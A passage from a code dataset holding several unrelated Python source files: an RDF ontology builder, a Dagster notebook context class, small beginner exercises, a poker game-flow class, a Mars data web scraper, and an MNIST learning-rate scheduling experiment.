tf.app.run()\n","repo_name":"AlexanderCaesar/goole-img-compression","sub_path":"google-img-compression-simple/sg_train.py","file_name":"sg_train.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"30694953747","text":"import rdflib\nfrom rdflib import Literal\n\ncounter = 0\n\n###############################################################################\n############################################################### primitives ####\n\ndef generate_id ():\n global counter\n \n count = counter\n counter += 1\n return count\n\ndef add_instance (i, c):\n g.add( (i, RDF['type'], c) )\n\ndef add_object_property(obj, pred, sub):\n g.add( (obj, pred, sub) )\n\ndef add_data_property(obj, pred, sub):\n g.add( (obj, pred, Literal(str(sub))) )\n\n###############################################################################\n################################################################## classes ####\n\ndef construct_organization (name):\n name = name.replace(' ', '_')\n organization = DEFAULT['organization/%s' % name]\n add_instance(organization, SCHEMA['Organization'])\n add_data_property(organization, SCHEMA['legalName'], name)\n return organization\n\ndef construct_outdoors ():\n outdoors = DEFAULT['outdoors']\n add_instance(outdoors, BRICK['Outdoors'])\n g.add( (BRICK['Outdoors'], RDFS['subClassOf'], BRICK['Location']) )\n add_data_property(outdoors, BRICK['label'], 'outdoors')\n return outdoors\n\ndef construct_building (name):\n name = name.replace(' ', '_')\n building = DEFAULT['buildings/%s' % name]\n add_instance(building, BRICK['Building'])\n add_data_property(building, BRICK['label'], name)\n return building\n\ndef construct_room (name):\n name = name.replace(' ', '_')\n room = DEFAULT['buildings/%s' % name]\n add_instance(room, BRICK['Room'])\n add_data_property(room, BRICK['label'], name)\n return room\n\ndef construct_service (name):\n name = name.replace(' ', '_')\n service = DEFAULT['services/%s' % name]\n add_instance(service, SAL['Service'])\n add_data_property(service, SAL['name'], Literal(name))\n return service\n\ndef construct_sep (service, organization, url, read, write, priority):\n # add information object\n sep = DEFAULT['sep/%u' % generate_id()]\n if read and write:\n add_instance(sep, SAL['KafkaRWServiceEndpoint'])\n elif read:\n add_instance(sep, SAL['KafkaRServiceEndpoint'])\n elif write:\n add_instance(sep, SAL['KafkaWServiceEndpoint'])\n else:\n print('ERROR: Attempting to add SEP(%s, %s, %s, %s, %s, %s) with r/w mismatch' % (service, organization, url, read, write, priority))\n \n if read:\n add_data_property(sep, SAL['read_topic'] , url)\n if write:\n add_data_property(sep, SAL['write_topic'], url)\n \n# add_instance(sep, SAL['ServiceEndpoint'])\n# add_data_property(sep, SAL['url'] , url)\n# add_data_property(sep, SAL['read'] , read)\n# add_data_property(sep, SAL['write'] , write)\n add_data_property(sep, SAL['priority'], priority)\n \n # link service to service endpoint object\n add_object_property(service, SAL['hasServiceEndpoint'], sep)\n \n # link service endpoint object to organization\n add_object_property(sep, SAL['ownedBy'], organization)\n \n return sep\n\ndef construct_information (sep, location_data, modality, unit, temporal, location):\n # add information object\n info = DEFAULT['info/%u' % generate_id()]\n add_instance(info, SAL['Information'])\n add_data_property( info, SAL['location'] , location_data)\n add_object_property(info, SAL['hasModality'] , modality)\n add_object_property(info, SAL['hasUnit'] , unit)\n add_object_property(info, SAL['hasTemporalAspect'], temporal)\n add_object_property(info, SAL['hasLocation'] , location)\n \n # link service endpoint to information object\n add_object_property(sep, SAL['hasInformation'], info)\n \n return info\n\n###############################################################################\n##################################################################### misc ####\n\ndef serialize (filename):\n g.serialize(filename, 'turtle')\n\n###############################################################################\n##################################################################### main ####\n\ng = rdflib.Graph()\nRDF = rdflib.Namespace('http://www.w3.org/1999/02/22-rdf-syntax-ns#')\nRDFS = rdflib.Namespace('http://www.w3.org/2000/01/rdf-schema#')\nSAL = rdflib.Namespace('https://ontology.hviidnet.com/sal.ttl#')\nSALI = rdflib.Namespace('https://ontology.hviidnet.com/sali.ttl#')\nBRICK = rdflib.Namespace('http://brickschema.org/ttl/Brick.ttl#')\nSCHEMA = rdflib.Namespace('http://schema.org/version/latest/schema.ttl#')\nDEFAULT = rdflib.Namespace('https://ontology.hviidnet.com/defaultbuilding.ttl#')\ng.bind('sal' , SAL)\ng.bind('sali' , SALI)\ng.bind('default', DEFAULT)\n\n","repo_name":"jakobhviid/ServiceAbstractionLayer","sub_path":"src/shared.py","file_name":"shared.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18000677073","text":"\r\nnums=[]\r\nn=5\r\nmayor=0\r\n\r\nfor i in range(n):\r\n num= int(input(\"Digite el número: \"))\r\n nums.append(num)\r\n if num > mayor:\r\n mayor=num\r\n posi=i\r\nprint (\"El número mayor es:\",mayor ,\"y se encuentra ubicado en la posición:\",posi)","repo_name":"axellicoaa/Programaci-n","sub_path":"TallerLista1.py","file_name":"TallerLista1.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9894940317","text":"from typing import AbstractSet, Any, Mapping, Optional, cast\n\nfrom dagster import (\n DagsterRun,\n JobDefinition,\n OpDefinition,\n _check as check,\n)\nfrom dagster._annotations import public\nfrom dagster._core.definitions.dependency import Node, NodeHandle\nfrom dagster._core.execution.context.compute import AbstractComputeExecutionContext\nfrom dagster._core.execution.context.system import PlanExecutionContext, StepExecutionContext\nfrom dagster._core.log_manager import DagsterLogManager\nfrom dagster._core.system_config.objects import ResolvedRunConfig\n\n\nclass DagstermillExecutionContext(AbstractComputeExecutionContext):\n \"\"\"Dagstermill-specific execution context.\n\n Do not initialize directly: use :func:`dagstermill.get_context`.\n \"\"\"\n\n def __init__(\n self,\n job_context: PlanExecutionContext,\n job_def: JobDefinition,\n resource_keys_to_init: AbstractSet[str],\n op_name: str,\n node_handle: NodeHandle,\n op_config: Any = None,\n ):\n self._job_context = check.inst_param(job_context, \"job_context\", PlanExecutionContext)\n self._job_def = check.inst_param(job_def, \"job_def\", JobDefinition)\n self._resource_keys_to_init = check.set_param(\n resource_keys_to_init, \"resource_keys_to_init\", of_type=str\n )\n self.op_name = check.str_param(op_name, \"op_name\")\n self.node_handle = check.inst_param(node_handle, \"node_handle\", NodeHandle)\n self._op_config = op_config\n\n def has_tag(self, key: str) -> bool:\n \"\"\"Check if a logging tag is defined on the context.\n\n Args:\n key (str): The key to check.\n\n Returns:\n bool\n \"\"\"\n check.str_param(key, \"key\")\n return self._job_context.has_tag(key)\n\n def get_tag(self, key: str) -> Optional[str]:\n \"\"\"Get a logging tag defined on the context.\n\n Args:\n key (str): The key to get.\n\n Returns:\n str\n \"\"\"\n check.str_param(key, \"key\")\n return self._job_context.get_tag(key)\n\n @public\n @property\n def run_id(self) -> str:\n \"\"\"str: The run_id for the context.\"\"\"\n return self._job_context.run_id\n\n @public\n @property\n def run_config(self) -> Mapping[str, Any]:\n \"\"\"dict: The run_config for the context.\"\"\"\n return self._job_context.run_config\n\n @property\n def resolved_run_config(self) -> ResolvedRunConfig:\n \"\"\":class:`dagster.ResolvedRunConfig`: The resolved_run_config for the context.\"\"\"\n return self._job_context.resolved_run_config\n\n @public\n @property\n def logging_tags(self) -> Mapping[str, str]:\n \"\"\"dict: The logging tags for the context.\"\"\"\n return self._job_context.logging_tags\n\n @public\n @property\n def job_name(self) -> str:\n \"\"\"str: The name of the executing job.\"\"\"\n return self._job_context.job_name\n\n @public\n @property\n def job_def(self) -> JobDefinition:\n \"\"\":class:`dagster.JobDefinition`: The job definition for the context.\n\n This will be a dagstermill-specific shim.\n \"\"\"\n return self._job_def\n\n @property\n def resources(self) -> Any:\n \"\"\"collections.namedtuple: A dynamically-created type whose properties allow access to\n resources.\n \"\"\"\n return self._job_context.scoped_resources_builder.build(\n required_resource_keys=self._resource_keys_to_init,\n )\n\n @public\n @property\n def run(self) -> DagsterRun:\n \"\"\":class:`dagster.DagsterRun`: The job run for the context.\"\"\"\n return cast(DagsterRun, self._job_context.dagster_run)\n\n @property\n def log(self) -> DagsterLogManager:\n \"\"\":class:`dagster.DagsterLogManager`: The log manager for the context.\n\n Call, e.g., ``log.info()`` to log messages through the Dagster machinery.\n \"\"\"\n return self._job_context.log\n\n @public\n @property\n def op_def(self) -> OpDefinition:\n \"\"\":class:`dagster.OpDefinition`: The op definition for the context.\n\n In interactive contexts, this may be a dagstermill-specific shim, depending whether an\n op definition was passed to ``dagstermill.get_context``.\n \"\"\"\n return cast(OpDefinition, self._job_def.node_def_named(self.op_name))\n\n @property\n def node(self) -> Node:\n \"\"\":class:`dagster.Node`: The node for the context.\n\n In interactive contexts, this may be a dagstermill-specific shim, depending whether an\n op definition was passed to ``dagstermill.get_context``.\n \"\"\"\n return self.job_def.get_node(self.node_handle)\n\n @public\n @property\n def op_config(self) -> Any:\n \"\"\"collections.namedtuple: A dynamically-created type whose properties allow access to\n op-specific config.\n \"\"\"\n if self._op_config:\n return self._op_config\n\n op_config = self.resolved_run_config.ops.get(self.op_name)\n return op_config.config if op_config else None\n\n\nclass DagstermillRuntimeExecutionContext(DagstermillExecutionContext):\n def __init__(\n self,\n job_context: PlanExecutionContext,\n job_def: JobDefinition,\n resource_keys_to_init: AbstractSet[str],\n op_name: str,\n step_context: StepExecutionContext,\n node_handle: NodeHandle,\n op_config: Any = None,\n ):\n self._step_context = check.inst_param(step_context, \"step_context\", StepExecutionContext)\n super().__init__(\n job_context,\n job_def,\n resource_keys_to_init,\n op_name,\n node_handle,\n op_config,\n )\n\n @property\n def step_context(self) -> StepExecutionContext:\n return self._step_context\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagstermill/dagstermill/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"16120762401","text":"#### compute the perimeter and the area of shapes\r\n\r\n\r\nwhile True: #unlimited loop for input\r\n shape_input = str(input(\"enter your shape name: \"))\r\n shape = shape_input.lower()\r\n \r\n #checking the right input\r\n if shape == 'circle':\r\n R = int(input(\"enter the radius of Circle: \"))\r\n \r\n circle_perimeter = 3.14*R*2\r\n circle_area = 3.14*R*R\r\n print(\"the perimeter of the circle is: {}{}the area of the circle is: {}\".format(circle_perimeter,'\\n',circle_area))\r\n #break\r\n elif shape == 'square':\r\n E = int(input(\"enter a edge of Square: \"))\r\n \r\n square_perimeter = E*4\r\n square_area = E**2\r\n print(\"the perimeter of the Square is: {}{}the area of the Square is: {}\".format(square_perimeter,'\\n',square_area))\r\n #break\r\n elif shape == 'rectangle':\r\n L = int(input(\"enter the length of Rectangle: \"))\r\n W = int(input(\"enter the width of Rectangle: \"))\r\n \r\n Rectangle_perimeter = (L+W)*2\r\n Rectangle_area = L*W\r\n print(\"the perimeter of the Rectangle is: {}{}the area of the Rectangle is: {}\".format(Rectangle_perimeter,'\\n',Rectangle_area))\r\n #break in case that u want to break the loop if the first shape name was correct :)\r\n else:\r\n print(\"Your entered name is wrong!\")\r\n \r\n","repo_name":"Roberick313/Workshop","sub_path":"project_12.py","file_name":"project_12.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86286218535","text":"#! usr/bin/env python3\n\n\"\"\"\nCleans DOE poetry corpus intolist of words\n\"\"\"\n\nimport re\nfrom termcolor import colored\n\npoem = input(\"\"\"Poem to search: \\n[1] Beowulf [2] Judith [3] Genesis [4] Exodus \n[5] Daniel [6] Andreas [7] Christ & Satan \"\"\")\n\nseek = input('Word to find: ')\n\nif poem == '1':\n my_file = 'beowulf.txt'\nif poem == '2':\n my_file = 'judith.txt'\nif poem == '3':\n my_file = 'genesis.txt'\nif poem == '4':\n my_file = 'exodus.txt'\nif poem == '5':\n my_file = 'daniel.txt'\nif poem == '6':\n my_file = 'andreas.txt'\nif poem == '7':\n my_file = 'christandsatan.txt'\n\nwith open(my_file, 'r') as fh:\n text = fh.read()\n text = text.lower()\n\n words = text.split()\n\n bigrams = [seek,]\n\n for index, word in enumerate(words):\n if word == seek:\n if index == len(words):\n print(index, colored(word, 'red'),' is the last word')\n elif index < len(words)-1:\n print(index, colored(word, 'red'),\n colored(words[index+1], 'red'))\n bigrams.append(words[index+1])\n\n\nprint(\"_____________________\\n\\nInstances of {0}: {1}\".format(seek, len(bigrams)))\nprint(bigrams)\n\n# _____________NOTES\n# \n# instances = re.findall(r\"\\b{0}\\b\".format(word), words)\n\n\n","repo_name":"sharris-umass/oe_fst","sub_path":"poetry/word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5145742676","text":"import sqlite3\nimport os\nimport schema\n\nDIRPATH = os.path.dirname(__file__)\nDBFILENAME = \"college.db\"\nDBPATH = os.path.join(DIRPATH,DBFILENAME)\n\ndbpath = DBPATH\n\n\ndef seed(dbpath):\n schema.schema(dbpath)#to rerun the schema clear the tables before running this code \n\n campuses = [\n (\"New York\",\"NY\"), # pk 1\n (\"Houston\",\"TX\")] # pk 2\n\n students = [\n (\"Walker\", \"Lockett\", 3.1, 1),# pk 1\n (\"Casey\", \"Coleman\", 2.7, 1),# pk 2\n (\"Franklyn\", \"Kilome\", 3.8, 1),# pk 3\n (\"Hecton\", \"Santiago\", 2.9, 1),# pk 4\n (\"Framber\", \"Valdez\", 3.9, 2),# pk 5\n (\"Brad\", \"Peacock\", 2.8, 2),# pk 6\n (\"Reymin\", \"Guduan\", 3.5, 2),# pk 7\n (\"Gerrit\", \"Cole\", 3.0, 2)]# pk 8\n\n with sqlite3.connect(dbpath) as connection:\n cursor = connection.cursor()\n SQL = \"\"\"INSERT INTO campuses(city, state) VALUES(?,?);\"\"\"\n for campus in campuses:\n cursor.execute(SQL,campus)\n\n with sqlite3.connect(dbpath) as connection:\n cursor = connection.cursor()\n SQL = \"\"\"INSERT INTO students(first_name, last_name, gpa, campus_pk) VALUES(?,?,?,?);\"\"\"\n for student in students:\n cursor.execute(SQL,student)\n \n\n\n\nif __name__ == \"__main__\":\n seed(dbpath) #commented out after run","repo_name":"NWood-Git/phase1_assessment","sub_path":"ANSWER_2/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70664764008","text":"from handEvaluator import *\r\nfrom playerClass import *\r\nfrom winnerFinder import *\r\nimport copy\r\nimport time\r\n################################################################################\r\n\r\n#Takes care of all gamflow mechanics of the poker game\r\n#Including changing players, advancing turns and rounds\r\n\r\nclass gameFlow():\r\n def __init__(self, numPlayers, playersList, game):\r\n self.roundNum = 1\r\n self.numPlayers = numPlayers\r\n self.smallBlind = 0\r\n self.bigBlind = self.smallBlind + 1\r\n self.dealer = (self.smallBlind - 1) % self.numPlayers\r\n self.defBet = 20\r\n self.minimumBet = self.defBet\r\n self.currentPlayer = (self.bigBlind + 1) % self.numPlayers\r\n self.bigBlindVal = self.minimumBet\r\n self.smallBlindVal = self.bigBlindVal // 2\r\n self.betList = [0] * self.numPlayers\r\n self.round = 1\r\n self.gameOver = False\r\n self.curBet = self.minimumBet\r\n self.tempBet = self.minimumBet\r\n self.onBoard = []\r\n self.game = game\r\n self.pot = 0\r\n self.gameStage = [\"Pre-Flop\"]\r\n self.lastRound = False\r\n self.gameStatus = [2] * self.numPlayers\r\n self.roundWinner = None\r\n self.winnerHand = None\r\n self.winnerType = None\r\n self.roundOver = False\r\n self.lastPlayerMove = None\r\n self.messages = []\r\n self.winDueToFold = [False, \"has won as everyone else folded\"]\r\n self.count = 0\r\n self.checkAfterRaise = False\r\n self.checkAfterCheck = False\r\n self.theatreMode = False\r\n self.numMoves = 0\r\n #0 - Folded\r\n #1 - Check\r\n #2 - Raise/Recheck\r\n\r\n def updateStatus(self, playerList):\r\n status = copy.copy(self.gameStatus)\r\n money = []\r\n for i in range(len(playerList)):\r\n player = playerList[i]\r\n if player.money > 0 and player.fold == False and status[i] != 0:\r\n status[i] = True\r\n else:\r\n status[i] = False\r\n if player.money == 0:\r\n money.append(player.money)\r\n if money == [0] * self.numPlayers:\r\n self.gameStatus = [1] * self.numPlayers\r\n status = [True] * self.numPlayers\r\n return status\r\n\r\n\r\n\r\n def move(self, move, playerID, playersList):\r\n if self.currentPlayer == 0 and move == \"raise\":\r\n currentAI = self.game.AIList[(self.currentPlayer + 1) % self.numPlayers]\r\n currentAI.raised = False\r\n currPlayer = playersList[self.currentPlayer]\r\n if move == \"fold\":\r\n self.messages.append(\"Player \" + str(playerID) + \" has FOLDED\")\r\n currPlayer.fold = True\r\n currPlayer.alreadyPlayed = True\r\n self.gameStatus[self.currentPlayer] = 0\r\n self.lastPlayerMove = \"fold\"\r\n elif move == \"check/call\":\r\n if self.lastPlayerMove == \"check/call\":\r\n self.checkAfterCheck = True\r\n if self.lastPlayerMove == \"raise\":\r\n self.checkAfterRaise = True\r\n self.messages.append(\"Player \" + str(playerID) + \" has CHECKED/CALLED\")\r\n call = max(self.betList) - self.betList[playerID]\r\n if call > currPlayer.money:\r\n call = currPlayer.money\r\n currPlayer.money -= call\r\n self.betList[playerID] += call\r\n currPlayer.alreadyPlayed = True\r\n self.lastPlayerMove = \"check/call\"\r\n self.gameStatus[self.currentPlayer] = 1\r\n elif move == \"raise\":\r\n if self.lastPlayerMove == \"raise\":\r\n self.tempBet *= 2\r\n self.checkAfterRaise = False\r\n self.messages.append(\"Player \" + str(playerID) + \" RAISED\")\r\n if currPlayer.money - self.tempBet < 0:\r\n self.tempBet = currPlayer.money\r\n self.minimumBet = self.tempBet\r\n currPlayer.money -= self.tempBet\r\n self.betList[playerID] += self.tempBet\r\n currPlayer.alreadyPlayed = True\r\n self.gameStatus[self.currentPlayer] = 2\r\n self.lastPlayerMove = \"raise\"\r\n for state in self.gameStatus:\r\n if state == 1:\r\n state = 2\r\n self.advancePlayer(self.game.players)\r\n self.currentPlayer %= self.numPlayers\r\n\r\n def advancePlayer(self, playerList):\r\n status = self.updateStatus(playerList)\r\n self.currentPlayer += 1\r\n if status.count(True) == 1:\r\n self.roundWinner = status.index(True)\r\n self.winnerHand = self.game.playerHands[self.roundWinner]\r\n self.pot += sum(self.betList)\r\n self.winDueToFold[0] = True\r\n self.roundOver = True\r\n if 2 not in self.gameStatus:\r\n self.nextTurn(playerList)\r\n \r\n if self.gameStatus.count(1) == self.numPlayers - 1 - self.gameStatus.count(0) and self.checkAfterRaise == True:\r\n self.checkAfterRaise = False\r\n self.nextTurn(playerList)\r\n if self.gameStatus.count(1) == self.numPlayers - self.gameStatus.count(0):\r\n self.nextTurn(playerList)\r\n\r\n\r\n def nextRound(self, playerList):\r\n playerList[self.roundWinner].money += sum(self.betList)\r\n self.smallBlind = (self.smallBlind + 1) % self.numPlayers\r\n self.bigBlind = (self.bigBlind + 1) % self.numPlayers\r\n self.dealer = (self.dealer + 1) % self.numPlayers\r\n self.currentPlayer = self.smallBlind\r\n for player in playerList:\r\n player.fold = False\r\n player.hand = []\r\n self.pot = 0\r\n self.count = 0\r\n self.game.deck = Deck()\r\n self.game.deck.onBoard = []\r\n self.game.playerHands = []\r\n self.game.simulatedFlopCards = []\r\n self.game.deck.shuffle()\r\n self.game.startGame()\r\n self.winnerHand = None\r\n self.winnerType = None\r\n self.roundWinner = None\r\n self.gameStage = [\"Pre-Flop\"]\r\n self.betList = [0] * self.numPlayers\r\n self.blinds(playerList)\r\n self.gameStatus = [2] * self.numPlayers\r\n self.defBet = 20\r\n self.tempBet = self.defBet\r\n\r\n \r\n def nextTurn(self, playersList):\r\n status = self.updateStatus(playersList)\r\n if status.count(True) == 1:\r\n self.roundWinner = status.index(True)\r\n playersList[self.roundWinner].money += sum(self.betList)\r\n self.roundOver = True\r\n self.pot += sum(self.betList)\r\n self.betList = [0] * self.numPlayers\r\n self.lastPlayerMove = None\r\n self.tempBet = 20\r\n self.messages = []\r\n foldCount = 0\r\n final = []\r\n for player in self.game.players:\r\n player.alreadyPlayed == False\r\n if player.fold == True:\r\n final.append(0)\r\n else:\r\n final.append(2)\r\n if len(self.game.deck.onBoard) < 5:\r\n self.gameStatus = final\r\n if \"Pre-Flop\" in self.gameStage and self.count == 0:\r\n self.game.flop()\r\n self.gameStage.append(\"Post-Flop\")\r\n self.count += 1\r\n elif \"Post-Flop\" in self.gameStage and self.count == 1:\r\n self.gameStage.append(\"Post-Flop 1\")\r\n self.game.deck.burn(1)\r\n self.game.deck.deal(1, True)\r\n self.count += 1\r\n elif \"Post-Flop 1\" in self.gameStage and self.count == 2:\r\n self.gameStage.append(\"Post-Flop 2\")\r\n self.game.deck.burn(1)\r\n self.game.deck.deal(1, True)\r\n self.count += 1\r\n else:\r\n stillPlaying = []\r\n for i in range(len(self.gameStatus)):\r\n status = self.gameStatus[i]\r\n if status != 0:\r\n stillPlaying.append(self.game.playerHands[i])\r\n\r\n result = bestInTable(stillPlaying, self.game.deck.onBoard)\r\n if result == \"split\" and self.numPlayers == 2:\r\n self.roundWinner = [0, 1]\r\n playersList[self.roundWinner[0]].money += (sum(self.betList)//2)\r\n playersList[self.roundWinner[1]].money += (sum(self.betList)//2)\r\n else: \r\n self.roundWinner = result[3]\r\n self.winnerType = result[1]\r\n self.winnerHand = result[0]\r\n playersList[self.roundWinner].money += sum(self.betList)\r\n self.roundOver = True\r\n \r\n\r\n\r\n def blinds(self, playersList):\r\n self.betList[self.bigBlind] += self.bigBlindVal\r\n playersList[self.bigBlind].money -= self.bigBlindVal\r\n self.betList[self.smallBlind] += self.smallBlindVal\r\n playersList[self.smallBlind].money -= self.smallBlindVal","repo_name":"danielco68/112TexasHoldem","sub_path":"gameflowMechanics.py","file_name":"gameflowMechanics.py","file_ext":"py","file_size_in_byte":8804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23017798769","text":"#Import Splinter, BeautifulSoup, and Pandas\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup as bs\nimport pandas as pd\nimport time\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nexecutable_path = {'executable_path': ChromeDriverManager().install()}\n\n\ndef scrape_all():\n # Initiate headless driver for deployment\n browser = Browser('chrome', **executable_path, headless=False)\n\n\n news_title, news_paragraph = mars_news(browser)\n\n # Run all scraping functions and store results in a dictionary\n data = {\n \"news_title\": news_title,\n \"news_paragraph\": news_paragraph,\n \"featured_image\": featured_image(browser),\n \"facts\": mars_facts(),\n \"hemispheres\": hemispheres_bg()\n }\n\n # Stop webdriver and return data\n browser.quit()\n return data\n\ndef mars_news(browser):\n # Visit the Mars news site\n url = 'https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest'\n browser.visit(url)\n\n # Convert the browser html to a soup object\n html = browser.html\n soup = bs(html, 'html.parser')\n\n #Use the parent element to find the first a tag and save it as `news_title`\n element = soup.select_one('div.list_text')\n element.find('div', class_='content_title')\n news_title = element.find('div', class_='content_title').get_text()\n #news_title\n # Use the parent element to find the paragraph text\n news_p = element.find('div', class_='article_teaser_body').get_text()\n #news_p\n\n return news_title, news_p\n\ndef featured_image(browser):\n # Visit URL\n jpl_url = 'https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/index.html'\n browser.visit(jpl_url)\n\n # Find and click the full image button use .click\n variable_button = browser.find_by_tag('button')[1]\n variable_button.click()\n\n # Parse the resulting html with soup\n html_page = browser.html\n html_soup = bs(html_page, 'html.parser')\n #print(html_soup)\n\n # find the relative image url\n featured_image_url = html_soup.find('img', class_ = 'fancybox-image').get('src')\n #featured_image_url\n\n # Use the base url (prefix webpage) to create an absolute url\n jpeg_html = ('https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/' + featured_image_url)\n #print(jpeg_html)\n \n return jpeg_html\n\ndef mars_facts():\n mars_df = pd.read_html('https://space-facts.com/mars/')[0]\n mars_df.columns = ['Description', 'Mars']\n mars_df.set_index('Description', inplace=True)\n #mars_df.style.set_caption('Mars Facts')\n \n return mars_df.to_html(classes=\"table table-striped\")\n \ndef hemispheres_bg(): \n browser = Browser('chrome', **executable_path, headless=False)\n browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')\n\n hemisphere_image_urls = []\n\n for i in range (4):\n #looks like an active person is using the webpage and not look like scraping\n #time.sleep(15)\n images=browser.find_by_tag('h3')\n images[i].click()\n html=browser.html\n soup=bs(html, 'html.parser')\n #<img class=\"wide-image\" src=\"/cache/images/f5e372a36edfa389625da6d0cc25d905_cerberus_enhanced.tif_full.jpg\">\n ending_url = soup.find('img', class_ = 'wide-image')['src']\n #<h2 class=\"title\">Cerberus Hemisphere Enhanced</h2>\n image_title = soup.find('h2', class_='title').text\n image_url = f'https://astrogeology.usgs.gov{ending_url}'\n image_dict = {'title': image_title, 'image_url': image_url}\n hemisphere_image_urls.append(image_dict)\n browser.back()\n\n browser.quit()\n \n return hemisphere_image_urls\n\nif __name__ == \"__main__\":\n\n # If running as script, print scraped data\n print(scrape_all())\n #print(hemispheres_bg())","repo_name":"bethgietl/web-scraping-challenge","sub_path":"app/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25588187848","text":"#%%\nimport numpy as np \nimport pandas as pd \nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.python.ops.gen_math_ops import log1p_eager_fallback, minimum_eager_fallback\n#%%\nmnist = keras.datasets.mnist\n(x_train, y_train),(x_test, y_test)=mnist.load_data()\n\n# 데이터 탐색\nimport matplotlib.pyplot as plt\nplt.imshow(x_train[0],cmap='gray')\ny_train[0]\nx_train[0]\n\n# 데이터 전처리\nfrom tensorflow.keras.utils import to_categorical\ndef percentage_onehot(x,y):\n x=np.array(x/255.0, dtype=np.float32) \n y=np.array(y, dtype=np.float32) \n \n OH_y = to_categorical(y)\n return x, OH_y\n\nx_train, y_train = percentage_onehot(x_train, y_train)\nx_test, y_test = percentage_onehot(x_test, y_test)\n#%%\nfrom tensorflow.keras import layers \nfrom tensorflow.keras.models import Model\nimport tensorflow as tf\n\n# functional_api\ninput_size_width = x_train.shape[1]\ninput_size_height = x_train.shape[2]\n\ndef image_model():\n input_=layers.Input(shape=(input_size_width, input_size_height))\n x = layers.Flatten()(input_)\n x = layers.Dense(100, activation='relu')(x) \n x = layers.Dense(30, activation='relu')(x)\n output_ = layers.Dense(10, activation='softmax')(x) # 실제값 : multinomial distribution\n model=Model(inputs=input_, outputs=output_) \n\n return model\n\nmodel = image_model()\nmodel.summary()\n#\n#%%\n\n\nbatch_train = tf.data.Dataset.from_tensor_slices((x_train, y_train)).shuffle(len(x_train), reshuffle_each_iteration=True).batch(128) #학습용 batch dataset: 128개\n#%%\n'''\n1. LearningRateScheduler를 이용한 learning rate 조정(cont)\n - exponential\n'''\ndef lr_scheduler(epoch, lr):\n\tif epoch < 5:\n\t\treturn lr\n\telse:\n\t\treturn lr * tf.math.exp(-0.1)\n\n# 모델 loss와 optimizer 설정 및 학습\nfrom tensorflow.keras.optimizers import Adam\nmodel = image_model()\nmodel.compile(optimizer=Adam(0.001), loss='categorical_crossentropy', metrics=['accuracy'])\ncallback = tf.keras.callbacks.LearningRateScheduler(lr_scheduler)\n\n# 학습\nhistory= model.fit(x=x_train, y=y_train, \n\t\t\t\t\t\t\t\t\t batch_size = 128, \n\t\t\t\t\t\t\t\t\t epochs = 10, \n\t\t\t\t\t\t\t\t\t validation_split = 0.15,\n\t\t\t\t\t\t\t\t\t callbacks = [callback],\n\t\t\t\t\t\t\t\t\t verbose = 1)\n\n#학습 이력\nprint(history.history['loss']) \nprint(history.history['accuracy'])\n\n# 테스트 데이터 세트로 모델 성능 검증\nmodel.evaluate(x_test, y_test, batch_size=64)\n#%%\n'''gradient tape\n - exponential'''\n\nlr = 0.1 \nlr_scehdule = [] \nlr_scehdule.append(lr)\nloss_function = tf.keras.losses.CategoricalCrossentropy()\nfor i in range(30):\n x_batch, y_batch = next(iter(batch_train)) \n with tf.GradientTape() as tape:\n # 예측\n output=model(x_batch) \n # loss 계산\u001F\n loss=loss_function(y_batch, output)\n # gradient 계산\n gradients=tape.gradient(loss, model.trainable_variables) #loss에 대해 각 trainable_variables를 편미분 -> gd 업데이트\n\n # 오차 역전파 - weight 업데이트\n if i < 5: # initial learning rate 사용\n for k in range(len(model.trainable_variables)):\n model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k]) \n lr_scehdule.append(lr)\n else: # exp(-0.1) 씩 감소하도록 조정\n lr = lr * tf.math.exp(-0.1)\n for k in range(len(model.trainable_variables)):\n model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k])\n lr_scehdule.append(lr)\n print(loss)\n\n\nplt.plot(lr_scehdule)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#%%\n'''\n2. LearningRateScheduler를 이용한 learning rate 조정(cont)\n - step\n'''\ndef step_lr_scheduler(epoch):\n first_lr = 0.1\n down = 0.5\n epoch_down_cycle = 5 # 5 epoch동안 고정\n lr = first_lr * (down ** np.floor(epoch/epoch_down_cycle)) # 일정한 비율 (down)로 learning rate을 감소시켜준다\n print('epoch=',epoch,'lr=', lr)\n return lr\n\ncallback = tf.keras.callbacks.LearningRateScheduler(step_lr_scheduler, verbose=1)\nhistory = model.fit(x=x_train, y=y_train, \n batch_size = 128, \n epochs = 20, \n validation_split = 0.15,\n callbacks = [callback],\n verbose = 1)\n#%%\n'''gradient tape\n - step'''\nlr = 0.1\ndown = 0.5\nepoch_down_cycle = 5 # 5 epoch동안 동결\nlr_scehdule = 